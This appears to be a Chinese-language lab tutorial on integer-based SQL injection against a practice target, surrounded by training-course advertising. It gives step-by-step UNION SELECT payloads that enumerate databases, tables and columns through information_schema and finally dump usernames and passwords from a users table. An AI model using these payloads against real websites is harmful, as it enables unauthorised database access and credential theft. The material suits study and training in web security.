SQL注入靶机(整形注入实验)

2019年04月03日 19:43:51 作者:LoadKnight 阅读数:3349791
网络安全渗透测试北京实地培训,五个月华丽蜕变,零元入学,报名联系:15320004362(手机同微信)。全国诚招招生代理,最低2000元起
第九期开班时间:2021年3月22日

抢先领取全套VIP视频教程

+10天免费学习名额

  已有8166人参加


视频课程

姓名 选填

电话


  张*燕188****220722分钟前

  王*军186****864498分钟前

  李*如189****445354分钟前

>>  稍后老师联系您发送相关视频课程  <<



报名CTF挑战赛,  预约名师指导

  已有 2366 人参加
姓名 选填

电话


  郭*明170****234291分钟前

  赵*东189****289646分钟前

  蔡*培135****589722分钟前





   

网络安全渗透测试群(必火安全学院):信息安全渗透测试群

护网行动日薪千元(初级中级高级)群:护网行动必火业余班级


首先要判断是什么类型的注入(由于是整形注入靶机取消这一步)

判断列数

order by 6 -确定是6列,因为设置超过6页面报错

1.png

判断显示位

id=-1 union select 1,2,3,4,5,6 id改成一个不存在的值,让他报错

2.png

可判断显示位为2,3

修改要查询的内容比如用户名和数据库名字

id = -1 union select 1,database(),user(),4,5,6

3.png

查询所有数据库的名字(默认保存在information_schema.schemata表中schema_name列)

select * from article where id = -1 union select 1,schema_name,3,4,5,6 from information_schema.schemata

4.png

可以查询到,但是只显示了一列,我们需要查询所有列

所以用group_concat来将其显示为一列

select * from article where id = -1 union select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata

5.png

发现了db_baji的数据库

然后在information_schema.tables这个表中查询table_name,限制条件是db_baji数据库

select * from article where id = -1 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema="db_baji"

6.png

发现了users

再查询表中的

select * from article where id = -1 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema="db_baji" and table_name="users"

7.png

查到username列 password列 可以查询具体内容

select * from article where id = -1 union select 1,group_concat(concat_ws(0x23,username,password)),3,4,5,6 from users

8.png

成功!